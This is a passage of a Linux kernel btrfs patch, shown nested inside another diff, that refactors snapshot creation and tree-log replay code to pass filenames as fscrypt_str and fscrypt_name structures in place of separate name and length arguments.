+@@ -1627,10 +1628,9 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	struct btrfs_root *root = pending->root;
+ 	struct btrfs_root *parent_root;
+ 	struct btrfs_block_rsv *rsv;
+-	struct inode *parent_inode;
++	struct inode *parent_inode = pending->dir;
+ 	struct btrfs_path *path;
+ 	struct btrfs_dir_item *dir_item;
+-	struct dentry *dentry;
+ 	struct extent_buffer *tmp;
+ 	struct extent_buffer *old;
+ 	struct timespec64 cur_time;
+@@ -1639,6 +1639,8 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	u64 index = 0;
+ 	u64 objectid;
+ 	u64 root_flags;
++	unsigned int nofs_flags;
++	struct fscrypt_name fname;
+ 
+ 	ASSERT(pending->path);
+ 	path = pending->path;
+@@ -1646,9 +1648,22 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	ASSERT(pending->root_item);
+ 	new_root_item = pending->root_item;
+ 
++	/*
++	 * We're inside a transaction and must make sure that any potential
++	 * allocations with GFP_KERNEL in fscrypt won't recurse back to
++	 * filesystem.
++	 */
++	nofs_flags = memalloc_nofs_save();
++	pending->error = fscrypt_setup_filename(parent_inode,
++						&pending->dentry->d_name, 0,
++						&fname);
++	memalloc_nofs_restore(nofs_flags);
++	if (pending->error)
++		goto free_pending;
++
+ 	pending->error = btrfs_get_free_objectid(tree_root, &objectid);
+ 	if (pending->error)
+-		goto no_free_objectid;
++		goto free_fname;
+ 
+ 	/*
+ 	 * Make qgroup to skip current new snapshot's qgroupid, as it is
+@@ -1677,8 +1692,6 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	trace_btrfs_space_reservation(fs_info, "transaction",
+ 				      trans->transid,
+ 				      trans->bytes_reserved, 1);
+-	dentry = pending->dentry;
+-	parent_inode = pending->dir;
+ 	parent_root = BTRFS_I(parent_inode)->root;
+ 	ret = record_root_in_trans(trans, parent_root, 0);
+ 	if (ret)
+@@ -1694,8 +1707,7 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	/* check if there is a file/dir which has the same name. */
+ 	dir_item = btrfs_lookup_dir_item(NULL, parent_root, path,
+ 					 btrfs_ino(BTRFS_I(parent_inode)),
+-					 dentry->d_name.name,
+-					 dentry->d_name.len, 0);
++					 &fname.disk_name, 0);
+ 	if (dir_item != NULL && !IS_ERR(dir_item)) {
+ 		pending->error = -EEXIST;
+ 		goto dir_item_existed;
+@@ -1790,7 +1802,7 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	ret = btrfs_add_root_ref(trans, objectid,
+ 				 parent_root->root_key.objectid,
+ 				 btrfs_ino(BTRFS_I(parent_inode)), index,
+-				 dentry->d_name.name, dentry->d_name.len);
++				 &fname.disk_name);
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+ 		goto fail;
+@@ -1822,9 +1834,9 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	if (ret < 0)
+ 		goto fail;
+ 
+-	ret = btrfs_insert_dir_item(trans, dentry->d_name.name,
+-				    dentry->d_name.len, BTRFS_I(parent_inode),
+-				    &key, BTRFS_FT_DIR, index);
++	ret = btrfs_insert_dir_item(trans, &fname.disk_name,
++				    BTRFS_I(parent_inode), &key, BTRFS_FT_DIR,
++				    index);
+ 	/* We have check then name at the beginning, so it is impossible. */
+ 	BUG_ON(ret == -EEXIST || ret == -EOVERFLOW);
+ 	if (ret) {
+@@ -1833,7 +1845,7 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	btrfs_i_size_write(BTRFS_I(parent_inode), parent_inode->i_size +
+-					 dentry->d_name.len * 2);
++						  fname.disk_name.len * 2);
+ 	parent_inode->i_mtime = current_time(parent_inode);
+ 	parent_inode->i_ctime = parent_inode->i_mtime;
+ 	ret = btrfs_update_inode_fallback(trans, parent_root, BTRFS_I(parent_inode));
+@@ -1865,7 +1877,9 @@ dir_item_existed:
+ 	trans->bytes_reserved = 0;
+ clear_skip_qgroup:
+ 	btrfs_clear_skip_qgroup(trans);
+-no_free_objectid:
++free_fname:
++	fscrypt_free_filename(&fname);
++free_pending:
+ 	kfree(new_root_item);
+ 	pending->root_item = NULL;
+ 	btrfs_free_path(path);
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index 00be69ce7b90f..c03ff6a5a7f6b 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -595,6 +595,21 @@ static int overwrite_item(struct btrfs_trans_handle *trans,
+ 	return do_overwrite_item(trans, root, path, eb, slot, key);
+ }
+ 
++static int read_alloc_one_name(struct extent_buffer *eb, void *start, int len,
++			       struct fscrypt_str *name)
++{
++	char *buf;
++
++	buf = kmalloc(len, GFP_NOFS);
++	if (!buf)
++		return -ENOMEM;
++
++	read_extent_buffer(eb, buf, (unsigned long)start, len);
++	name->name = buf;
++	name->len = len;
++	return 0;
++}
++
+ /*
+  * simple helper to read an inode off the disk from a given root
+  * This can only be called for subvolume roots and not for the log
+@@ -901,12 +916,11 @@ out:
+ static int unlink_inode_for_log_replay(struct btrfs_trans_handle *trans,
+ 				       struct btrfs_inode *dir,
+ 				       struct btrfs_inode *inode,
+-				       const char *name,
+-				       int name_len)
++				       const struct fscrypt_str *name)
+ {
+ 	int ret;
+ 
+-	ret = btrfs_unlink_inode(trans, dir, inode, name, name_len);
++	ret = btrfs_unlink_inode(trans, dir, inode, name);
+ 	if (ret)
+ 		return ret;
+ 	/*
+@@ -933,8 +947,7 @@ static noinline int drop_one_dir_item(struct btrfs_trans_handle *trans,
+ {
+ 	struct btrfs_root *root = dir->root;
+ 	struct inode *inode;
+-	char *name;
+-	int name_len;
++	struct fscrypt_str name;
+ 	struct extent_buffer *leaf;
+ 	struct btrfs_key location;
+ 	int ret;
+@@ -942,12 +955,10 @@ static noinline int drop_one_dir_item(struct btrfs_trans_handle *trans,
+ 	leaf = path->nodes[0];
+ 
+ 	btrfs_dir_item_key_to_cpu(leaf, di, &location);
+-	name_len = btrfs_dir_name_len(leaf, di);
+-	name = kmalloc(name_len, GFP_NOFS);
+-	if (!name)
++	ret = read_alloc_one_name(leaf, di + 1, btrfs_dir_name_len(leaf, di), &name);
++	if (ret)
+ 		return -ENOMEM;
+ 
+-	read_extent_buffer(leaf, name, (unsigned long)(di + 1), name_len);
+ 	btrfs_release_path(path);
+ 
+ 	inode = read_one_inode(root, location.objectid);
+@@ -960,10 +971,9 @@ static noinline int drop_one_dir_item(struct btrfs_trans_handle *trans,
+ 	if (ret)
+ 		goto out;
+ 
+-	ret = unlink_inode_for_log_replay(trans, dir, BTRFS_I(inode), name,
+-			name_len);
++	ret = unlink_inode_for_log_replay(trans, dir, BTRFS_I(inode), &name);
+ out:
+-	kfree(name);
++	kfree(name.name);
+ 	iput(inode);
+ 	return ret;
+ }
+@@ -978,14 +988,14 @@ out:
+ static noinline int inode_in_dir(struct btrfs_root *root,
+ 				 struct btrfs_path *path,
+ 				 u64 dirid, u64 objectid, u64 index,
+-				 const char *name, int name_len)
++				 struct fscrypt_str *name)
+ {
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key location;
+ 	int ret = 0;
+ 
+ 	di = btrfs_lookup_dir_index_item(NULL, root, path, dirid,
+-					 index, name, name_len, 0);
++					 index, name, 0);
+ 	if (IS_ERR(di)) {
+ 		ret = PTR_ERR(di);
+ 		goto out;
+@@ -998,7 +1008,7 @@ static noinline int inode_in_dir(struct btrfs_root *root,
+ 	}
+ 
+ 	btrfs_release_path(path);
+-	di = btrfs_lookup_dir_item(NULL, root, path, dirid, name, name_len, 0);
++	di = btrfs_lookup_dir_item(NULL, root, path, dirid, name, 0);
+ 	if (IS_ERR(di)) {
+ 		ret = PTR_ERR(di);
+ 		goto out;
+@@ -1025,7 +1035,7 @@ out:
+ static noinline int backref_in_log(struct btrfs_root *log,
+ 				   struct btrfs_key *key,
+ 				   u64 ref_objectid,
+-				   const char *name, int namelen)
++				   const struct fscrypt_str *name)
+ {
+ 	struct btrfs_path *path;
+ 	int ret;
+@@ -1045,12 +1055,10 @@ static noinline int backref_in_log(struct btrfs_root *log,
+ 	if (key->type == BTRFS_INODE_EXTREF_KEY)
+ 		ret = !!btrfs_find_name_in_ext_backref(path->nodes[0],
+ 						       path->slots[0],
+-						       ref_objectid,
+-						       name, namelen);
++						       ref_objectid, name);
+ 	else
+ 		ret = !!btrfs_find_name_in_backref(path->nodes[0],
+-						   path->slots[0],
+-						   name, namelen);
++						   path->slots[0], name);
+ out:
+ 	btrfs_free_path(path);
+ 	return ret;
+@@ -1063,11 +1071,9 @@ static inline int __add_inode_ref(struct btrfs_trans_handle *trans,
+ 				  struct btrfs_inode *dir,
+ 				  struct btrfs_inode *inode,
+ 				  u64 inode_objectid, u64 parent_objectid,
+-				  u64 ref_index, char *name, int namelen)
++				  u64 ref_index, struct fscrypt_str *name)
+ {
+ 	int ret;
+-	char *victim_name;
+-	int victim_name_len;
+ 	struct extent_buffer *leaf;
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key search_key;
+@@ -1099,43 +1105,40 @@ again:
+ 		ptr = btrfs_item_ptr_offset(leaf, path->slots[0]);
+ 		ptr_end = ptr + btrfs_item_size(leaf, path->slots[0]);
+ 		while (ptr < ptr_end) {
+-			victim_ref = (struct btrfs_inode_ref *)ptr;
+-			victim_name_len = btrfs_inode_ref_name_len(leaf,
+-								   victim_ref);
+-			victim_name = kmalloc(victim_name_len, GFP_NOFS);
+-			if (!victim_name)
+-				return -ENOMEM;
++			struct fscrypt_str victim_name;
+ 
+-			read_extent_buffer(leaf, victim_name,
+-					   (unsigned long)(victim_ref + 1),
+-					   victim_name_len);
++			victim_ref = (struct btrfs_inode_ref *)ptr;
++			ret = read_alloc_one_name(leaf, (victim_ref + 1),
++				 btrfs_inode_ref_name_len(leaf, victim_ref),
++				 &victim_name);
++			if (ret)
++				return ret;
+ 
+ 			ret = backref_in_log(log_root, &search_key,
+-					     parent_objectid, victim_name,
+-					     victim_name_len);
++					     parent_objectid, &victim_name);
+ 			if (ret < 0) {
+-				kfree(victim_name);
++				kfree(victim_name.name);
+ 				return ret;
+ 			} else if (!ret) {
+ 				inc_nlink(&inode->vfs_inode);
+ 				btrfs_release_path(path);
+ 
+ 				ret = unlink_inode_for_log_replay(trans, dir, inode,
+-						victim_name, victim_name_len);
+-				kfree(victim_name);
++						&victim_name);
++				kfree(victim_name.name);
+ 				if (ret)
+ 					return ret;
+ 				goto again;
+ 			}
+-			kfree(victim_name);
++			kfree(victim_name.name);
+ 
+-			ptr = (unsigned long)(victim_ref + 1) + victim_name_len;
++			ptr = (unsigned long)(victim_ref + 1) + victim_name.len;
+ 		}
+ 	}
+ 	btrfs_release_path(path);
+ 
+ 	/* Same search but for extended refs */
+-	extref = btrfs_lookup_inode_extref(NULL, root, path, name, namelen,
++	extref = btrfs_lookup_inode_extref(NULL, root, path, name,
+ 					   inode_objectid, parent_objectid, 0,
+ 					   0);
+ 	if (IS_ERR(extref)) {
+@@ -1152,29 +1155,28 @@ again:
+ 		base = btrfs_item_ptr_offset(leaf, path->slots[0]);
+ 
+ 		while (cur_offset < item_size) {
+-			extref = (struct btrfs_inode_extref *)(base + cur_offset);
++			struct fscrypt_str victim_name;
+ 
+-			victim_name_len = btrfs_inode_extref_name_len(leaf, extref);
++			extref = (struct btrfs_inode_extref *)(base + cur_offset);
+ 
+ 			if (btrfs_inode_extref_parent(leaf, extref) != parent_objectid)
+ 				goto next;
+ 
+-			victim_name = kmalloc(victim_name_len, GFP_NOFS);
+-			if (!victim_name)
+-				return -ENOMEM;
+-			read_extent_buffer(leaf, victim_name, (unsigned long)&extref->name,
+-					   victim_name_len);
++			ret = read_alloc_one_name(leaf, &extref->name,
++				 btrfs_inode_extref_name_len(leaf, extref),
++				 &victim_name);
++			if (ret)
++				return ret;
+ 
+ 			search_key.objectid = inode_objectid;
+ 			search_key.type = BTRFS_INODE_EXTREF_KEY;
+ 			search_key.offset = btrfs_extref_hash(parent_objectid,
+-							      victim_name,
+-							      victim_name_len);
++							      victim_name.name,
++							      victim_name.len);
+ 			ret = backref_in_log(log_root, &search_key,
+-					     parent_objectid, victim_name,
+-					     victim_name_len);
++					     parent_objectid, &victim_name);
+ 			if (ret < 0) {
+-				kfree(victim_name);
++				kfree(victim_name.name);
+ 				return ret;
+ 			} else if (!ret) {
+ 				ret = -ENOENT;
+@@ -1186,26 +1188,24 @@ again:
+ 
+ 					ret = unlink_inode_for_log_replay(trans,
+ 							BTRFS_I(victim_parent),
+-							inode,
+-							victim_name,
+-							victim_name_len);
++							inode, &victim_name);
+ 				}
+ 				iput(victim_parent);
+-				kfree(victim_name);
++				kfree(victim_name.name);
+ 				if (ret)
+ 					return ret;
+ 				goto again;
+ 			}
+-			kfree(victim_name);
++			kfree(victim_name.name);
+ next:
+-			cur_offset += victim_name_len + sizeof(*extref);
++			cur_offset += victim_name.len + sizeof(*extref);
+ 		}
+ 	}
+ 	btrfs_release_path(path);
+ 
+ 	/* look for a conflicting sequence number */
+ 	di = btrfs_lookup_dir_index_item(trans, root, path, btrfs_ino(dir),
+-					 ref_index, name, namelen, 0);
++					 ref_index, name, 0);
+ 	if (IS_ERR(di)) {
+ 		return PTR_ERR(di);
+ 	} else if (di) {
+@@ -1216,8 +1216,7 @@ next:
+ 	btrfs_release_path(path);
+ 
+ 	/* look for a conflicting name */
+-	di = btrfs_lookup_dir_item(trans, root, path, btrfs_ino(dir),
+-				   name, namelen, 0);
++	di = btrfs_lookup_dir_item(trans, root, path, btrfs_ino(dir), name, 0);
+ 	if (IS_ERR(di)) {
+ 		return PTR_ERR(di);
+ 	} else if (di) {
+@@ -1231,20 +1230,18 @@ next:
+ }
+ 
+ static int extref_get_fields(struct extent_buffer *eb, unsigned long ref_ptr,
+-			     u32 *namelen, char **name, u64 *index,
++			     struct fscrypt_str *name, u64 *index,
+ 			     u64 *parent_objectid)
+ {
+ 	struct btrfs_inode_extref *extref;
++	int ret;
+ 
+ 	extref = (struct btrfs_inode_extref *)ref_ptr;
+ 
+-	*namelen = btrfs_inode_extref_name_len(eb, extref);
+-	*name = kmalloc(*namelen, GFP_NOFS);
+-	if (*name == NULL)
+-		return -ENOMEM;
+-
+-	read_extent_buffer(eb, *name, (unsigned long)&extref->name,
+-			   *namelen);
++	ret = read_alloc_one_name(eb, &extref->name,
++				  btrfs_inode_extref_name_len(eb, extref), name);
++	if (ret)
++		return ret;
+ 
+ 	if (index)
+ 		*index = btrfs_inode_extref_index(eb, extref);
+@@ -1255,18 +1252,17 @@ static int extref_get_fields(struct extent_buffer *eb, unsigned long ref_ptr,
+ }
+ 
+ static int ref_get_fields(struct extent_buffer *eb, unsigned long ref_ptr,
+-			  u32 *namelen, char **name, u64 *index)
++			  struct fscrypt_str *name, u64 *index)
+ {
+ 	struct btrfs_inode_ref *ref;
++	int ret;
+ 
+ 	ref = (struct btrfs_inode_ref *)ref_ptr;
+ 
+-	*namelen = btrfs_inode_ref_name_len(eb, ref);
+-	*name = kmalloc(*namelen, GFP_NOFS);
+-	if (*name == NULL)
+-		return -ENOMEM;
+-
+-	read_extent_buffer(eb, *name, (unsigned long)(ref + 1), *namelen);
++	ret = read_alloc_one_name(eb, ref + 1, btrfs_inode_ref_name_len(eb, ref),
++				  name);
++	if (ret)
++		return ret;
+ 
+ 	if (index)
+ 		*index = btrfs_inode_ref_index(eb, ref);
+@@ -1308,28 +1304,24 @@ again:
+ 	ref_ptr = btrfs_item_ptr_offset(eb, path->slots[0]);
+ 	ref_end = ref_ptr + btrfs_item_size(eb, path->slots[0]);
+ 	while (ref_ptr < ref_end) {
+-		char *name = NULL;
+-		int namelen;
++		struct fscrypt_str name;
+ 		u64 parent_id;
+ 
+ 		if (key->type == BTRFS_INODE_EXTREF_KEY) {
+-			ret = extref_get_fields(eb, ref_ptr, &namelen, &name,
++			ret = extref_get_fields(eb, ref_ptr, &name,
+ 						NULL, &parent_id);
+ 		} else {
+ 			parent_id = key->offset;
+-			ret = ref_get_fields(eb, ref_ptr, &namelen, &name,
+-					     NULL);
++			ret = ref_get_fields(eb, ref_ptr, &name, NULL);
+ 		}
+ 		if (ret)
+ 			goto out;
+ 
+ 		if (key->type == BTRFS_INODE_EXTREF_KEY)
+ 			ret = !!btrfs_find_name_in_ext_backref(log_eb, log_slot,
+-							       parent_id, name,
+-							       namelen);
++							       parent_id, &name);
+ 		else
+-			ret = !!btrfs_find_name_in_backref(log_eb, log_slot,
+-							   name, namelen);
++			ret = !!btrfs_find_name_in_backref(log_eb, log_slot, &name);
+ 
+ 		if (!ret) {
+ 			struct inode *dir;
+@@ -1338,20 +1330,20 @@ again:
+ 			dir = read_one_inode(root, parent_id);
+ 			if (!dir) {
+ 				ret = -ENOENT;
+-				kfree(name);
++				kfree(name.name);
+ 				goto out;
+ 			}
+ 			ret = unlink_inode_for_log_replay(trans, BTRFS_I(dir),
+-						 inode, name, namelen);
+-			kfree(name);
++						 inode, &name);
++			kfree(name.name);
+ 			iput(dir);
+ 			if (ret)
+ 				goto out;
+ 			goto again;
+ 		}
+ 
+-		kfree(name);
+-		ref_ptr += namelen;
++		kfree(name.name);
++		ref_ptr += name.len;
+ 		if (key->type == BTRFS_INODE_EXTREF_KEY)
+ 			ref_ptr += sizeof(struct btrfs_inode_extref);
+ 		else
+@@ -1380,8 +1372,7 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 	struct inode *inode = NULL;
+ 	unsigned long ref_ptr;
+ 	unsigned long ref_end;
+-	char *name = NULL;
+-	int namelen;
++	struct fscrypt_str name;
+ 	int ret;
+ 	int log_ref_ver = 0;
+ 	u64 parent_objectid;
+@@ -1425,7 +1416,7 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 
+ 	while (ref_ptr < ref_end) {
+ 		if (log_ref_ver) {
+-			ret = extref_get_fields(eb, ref_ptr, &namelen, &name,
++			ret = extref_get_fields(eb, ref_ptr, &name,
+ 						&ref_index, &parent_objectid);
+ 			/*
+ 			 * parent object can change from one array
+@@ -1438,15 +1429,13 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 				goto out;
+ 			}
+ 		} else {
+-			ret = ref_get_fields(eb, ref_ptr, &namelen, &name,
+-					     &ref_index);
++			ret = ref_get_fields(eb, ref_ptr, &name, &ref_index);
+ 		}
+ 		if (ret)
+ 			goto out;
+ 
+ 		ret = inode_in_dir(root, path, btrfs_ino(BTRFS_I(dir)),
+-				   btrfs_ino(BTRFS_I(inode)), ref_index,
+-				   name, namelen);
++				   btrfs_ino(BTRFS_I(inode)), ref_index, &name);
+ 		if (ret < 0) {
+ 			goto out;
+ 		} else if (ret == 0) {
+@@ -1460,7 +1449,7 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 			ret = __add_inode_ref(trans, root, path, log,
+ 					      BTRFS_I(dir), BTRFS_I(inode),
+ 					      inode_objectid, parent_objectid,
+-					      ref_index, name, namelen);
++					      ref_index, &name);
+ 			if (ret) {
+ 				if (ret == 1)
+ 					ret = 0;
+@@ -1469,7 +1458,7 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 
+ 			/* insert our name */
+ 			ret = btrfs_add_link(trans, BTRFS_I(dir), BTRFS_I(inode),
+-					     name, namelen, 0, ref_index);
++					     &name, 0, ref_index);
+ 			if (ret)
+ 				goto out;
+ 
+@@ -1479,9 +1468,9 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 		}
+ 		/* Else, ret == 1, we already have a perfect match, we're done. */
+ 
+-		ref_ptr = (unsigned long)(ref_ptr + ref_struct_size) + namelen;
+-		kfree(name);
+-		name = NULL;
++		ref_ptr = (unsigned long)(ref_ptr + ref_struct_size) + name.len;
++		kfree(name.name);
++		name.name = NULL;
+ 		if (log_ref_ver) {
+ 			iput(dir);
+ 			dir = NULL;
+@@ -1505,7 +1494,7 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 	ret = overwrite_item(trans, root, path, eb, slot, key);
+ out:
+ 	btrfs_release_path(path);
+-	kfree(name);
++	kfree(name.name);
+ 	iput(dir);
+ 	iput(inode);
+ 	return ret;
+@@ -1777,7 +1766,7 @@ static noinline int link_to_fixup_dir(struct btrfs_trans_handle *trans,
+ static noinline int insert_one_name(struct btrfs_trans_handle *trans,
+ 				    struct btrfs_root *root,
+ 				    u64 dirid, u64 index,
+-				    char *name, int name_len,
++				    const struct fscrypt_str *name,
+ 				    struct btrfs_key *location)
+ {
+ 	struct inode *inode;
+@@ -1795,7 +1784,7 @@ static noinline int insert_one_name(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	ret = btrfs_add_link(trans, BTRFS_I(dir), BTRFS_I(inode), name,
+-			name_len, 1, index);
++			     1, index);
+ 
+ 	/* FIXME, put inode into FIXUP list */
+ 
+@@ -1855,8 +1844,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 				    struct btrfs_dir_item *di,
+ 				    struct btrfs_key *key)
+ {
+-	char *name;
+-	int name_len;
++	struct fscrypt_str name;
+ 	struct btrfs_dir_item *dir_dst_di;
+ 	struct btrfs_dir_item *index_dst_di;
+ 	bool dir_dst_matches = false;
+@@ -1874,17 +1862,11 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 	if (!dir)
+ 		return -EIO;
+ 
+-	name_len = btrfs_dir_name_len(eb, di);
+-	name = kmalloc(name_len, GFP_NOFS);
+-	if (!name) {
+-		ret = -ENOMEM;
++	ret = read_alloc_one_name(eb, di + 1, btrfs_dir_name_len(eb, di), &name);
++	if (ret)
+ 		goto out;
+-	}
+ 
+ 	log_type = btrfs_dir_type(eb, di);
+-	read_extent_buffer(eb, name, (unsigned long)(di + 1),
+-		   name_len);
+-
+ 	btrfs_dir_item_key_to_cpu(eb, di, &log_key);
+ 	ret = btrfs_lookup_inode(trans, root, path, &log_key, 0);
+ 	btrfs_release_path(path);
+@@ -1894,7 +1876,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 	ret = 0;
+ 
+ 	dir_dst_di = btrfs_lookup_dir_item(trans, root, path, key->objectid,
+-					   name, name_len, 1);
++					   &name, 1);
+ 	if (IS_ERR(dir_dst_di)) {
+ 		ret = PTR_ERR(dir_dst_di);
+ 		goto out;
+@@ -1911,7 +1893,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 
+ 	index_dst_di = btrfs_lookup_dir_index_item(trans, root, path,
+ 						   key->objectid, key->offset,
+-						   name, name_len, 1);
++						   &name, 1);
+ 	if (IS_ERR(index_dst_di)) {
+ 		ret = PTR_ERR(index_dst_di);
+ 		goto out;
+@@ -1939,7 +1921,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 	search_key.objectid = log_key.objectid;
+ 	search_key.type = BTRFS_INODE_REF_KEY;
+ 	search_key.offset = key->objectid;
+-	ret = backref_in_log(root->log_root, &search_key, 0, name, name_len);
++	ret = backref_in_log(root->log_root, &search_key, 0, &name);
+ 	if (ret < 0) {
+ 	        goto out;
+ 	} else if (ret) {
+@@ -1952,8 +1934,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 	search_key.objectid = log_key.objectid;
+ 	search_key.type = BTRFS_INODE_EXTREF_KEY;
+ 	search_key.offset = key->objectid;
+-	ret = backref_in_log(root->log_root, &search_key, key->objectid, name,
+-			     name_len);
++	ret = backref_in_log(root->log_root, &search_key, key->objectid, &name);
+ 	if (ret < 0) {
+ 		goto out;
+ 	} else if (ret) {
+@@ -1964,7 +1945,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 	}
+ 	btrfs_release_path(path);
+ 	ret = insert_one_name(trans, root, key->objectid, key->offset,
+-			      name, name_len, &log_key);
++			      &name, &log_key);
+ 	if (ret && ret != -ENOENT && ret != -EEXIST)
+ 		goto out;
+ 	if (!ret)
+@@ -1974,10 +1955,10 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 
+ out:
+ 	if (!ret && update_size) {
+-		btrfs_i_size_write(BTRFS_I(dir), dir->i_size + name_len * 2);
++		btrfs_i_size_write(BTRFS_I(dir), dir->i_size + name.len * 2);
+ 		ret = btrfs_update_inode(trans, root, BTRFS_I(dir));
+ 	}
+-	kfree(name);
++	kfree(name.name);
+ 	iput(dir);
+ 	if (!ret && name_added)
+ 		ret = 1;
+@@ -2143,8 +2124,7 @@ static noinline int check_item_in_log(struct btrfs_trans_handle *trans,
+ 	struct extent_buffer *eb;
+ 	int slot;
+ 	struct btrfs_dir_item *di;
+-	int name_len;
+-	char *name;
++	struct fscrypt_str name;
+ 	struct inode *inode = NULL;
+ 	struct btrfs_key location;
+ 
+@@ -2159,22 +2139,16 @@ static noinline int check_item_in_log(struct btrfs_trans_handle *trans,
+ 	eb = path->nodes[0];
+ 	slot = path->slots[0];
+ 	di = btrfs_item_ptr(eb, slot, struct btrfs_dir_item);
+-	name_len = btrfs_dir_name_len(eb, di);
+-	name = kmalloc(name_len, GFP_NOFS);
+-	if (!name) {
+-		ret = -ENOMEM;
++	ret = read_alloc_one_name(eb, di + 1, btrfs_dir_name_len(eb, di), &name);
++	if (ret)
+ 		goto out;
+-	}
+-
+-	read_extent_buffer(eb, name, (unsigned long)(di + 1), name_len);
+ 
+ 	if (log) {
+ 		struct btrfs_dir_item *log_di;
+ 
+ 		log_di = btrfs_lookup_dir_index_item(trans, log, log_path,
+ 						     dir_key->objectid,
+-						     dir_key->offset,
+-						     name, name_len, 0);
++						     dir_key->offset, &name, 0);
+ 		if (IS_ERR(log_di)) {
+ 			ret = PTR_ERR(log_di);
+ 			goto out;
+@@ -2200,7 +2174,7 @@ static noinline int check_item_in_log(struct btrfs_trans_handle *trans,
+ 
+ 	inc_nlink(inode);
+ 	ret = unlink_inode_for_log_replay(trans, BTRFS_I(dir), BTRFS_I(inode),
+-					  name, name_len);
++					  &name);
+ 	/*
+ 	 * Unlike dir item keys, dir index keys can only have one name (entry) in
+ 	 * them, as there are no key collisions since each key has a unique offset
+@@ -2209,7 +2183,7 @@ static noinline int check_item_in_log(struct btrfs_trans_handle *trans,
+ out:
+ 	btrfs_release_path(path);
+ 	btrfs_release_path(log_path);
+-	kfree(name);
++	kfree(name.name);
+ 	iput(inode);
+ 	return ret;
+ }
+@@ -3443,7 +3417,7 @@ static int del_logged_dentry(struct btrfs_trans_handle *trans,
+ 			     struct btrfs_root *log,
+ 			     struct btrfs_path *path,
+ 			     u64 dir_ino,
+-			     const char *name, int name_len,
++			     const struct fscrypt_str *name,
+ 			     u64 index)
+ {
+ 	struct btrfs_dir_item *di;
+@@ -3453,7 +3427,7 @@ static int del_logged_dentry(struct btrfs_trans_handle *trans,
+ 	 * for dir item keys.
+ 	 */
+ 	di = btrfs_lookup_dir_index_item(trans, log, path, dir_ino,
+-					 index, name, name_len, -1);
++					 index, name, -1);
+ 	if (IS_ERR(di))
+ 		return PTR_ERR(di);
+ 	else if (!di)
+@@ -3490,7 +3464,7 @@ static int del_logged_dentry(struct btrfs_trans_handle *trans,
+  */
+ void btrfs_del_dir_entries_in_log(struct btrfs_trans_handle *trans,
+ 				  struct btrfs_root *root,
+-				  const char *name, int name_len,
++				  const struct fscrypt_str *name,
+ 				  struct btrfs_inode *dir, u64 index)
+ {
+ 	struct btrfs_path *path;
+@@ -3517,7 +3491,7 @@ void btrfs_del_dir_entries_in_log(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	ret = del_logged_dentry(trans, root->log_root, path, btrfs_ino(dir),
+-				name, name_len, index);
++				name, index);
+ 	btrfs_free_path(path);
+ out_unlock:
+ 	mutex_unlock(&dir->log_mutex);
+@@ -3529,7 +3503,7 @@ out_unlock:
+ /* see comments for btrfs_del_dir_entries_in_log */
+ void btrfs_del_inode_ref_in_log(struct btrfs_trans_handle *trans,
+ 				struct btrfs_root *root,
+-				const char *name, int name_len,
++				const struct fscrypt_str *name,
+ 				struct btrfs_inode *inode, u64 dirid)
+ {
+ 	struct btrfs_root *log;
+@@ -3550,7 +3524,7 @@ void btrfs_del_inode_ref_in_log(struct btrfs_trans_handle *trans,
+ 	log = root->log_root;
+ 	mutex_lock(&inode->log_mutex);
+ 
+-	ret = btrfs_del_inode_ref(trans, log, name, name_len, btrfs_ino(inode),
++	ret = btrfs_del_inode_ref(trans, log, name, btrfs_ino(inode),
+ 				  dirid, &index);
+ 	mutex_unlock(&inode->log_mutex);
+ 	if (ret < 0 && ret != -ENOENT)
+@@ -5293,6 +5267,7 @@ static int btrfs_check_ref_name_override(struct extent_buffer *eb,
+ 		u32 this_len;
+ 		unsigned long name_ptr;
+ 		struct btrfs_dir_item *di;
++		struct fscrypt_str name_str;
+ 
+ 		if (key->type == BTRFS_INODE_REF_KEY) {
+ 			struct btrfs_inode_ref *iref;
+@@ -5326,8 +5301,11 @@ static int btrfs_check_ref_name_override(struct extent_buffer *eb,
+ 		}
+ 
+ 		read_extent_buffer(eb, name, name_ptr, this_name_len);
++
++		name_str.name = name;
++		name_str.len = this_name_len;
+ 		di = btrfs_lookup_dir_item(NULL, inode->root, search_path,
+-				parent, name, this_name_len, 0);
++				parent, &name_str, 0);
+ 		if (di && !IS_ERR(di)) {
+ 			struct btrfs_key di_key;
+ 
+@@ -7493,9 +7471,14 @@ void btrfs_log_new_name(struct btrfs_trans_handle *trans,
+ 	if (old_dir && old_dir->logged_trans == trans->transid) {
+ 		struct btrfs_root *log = old_dir->root->log_root;
+ 		struct btrfs_path *path;
++		struct fscrypt_name fname;
+ 
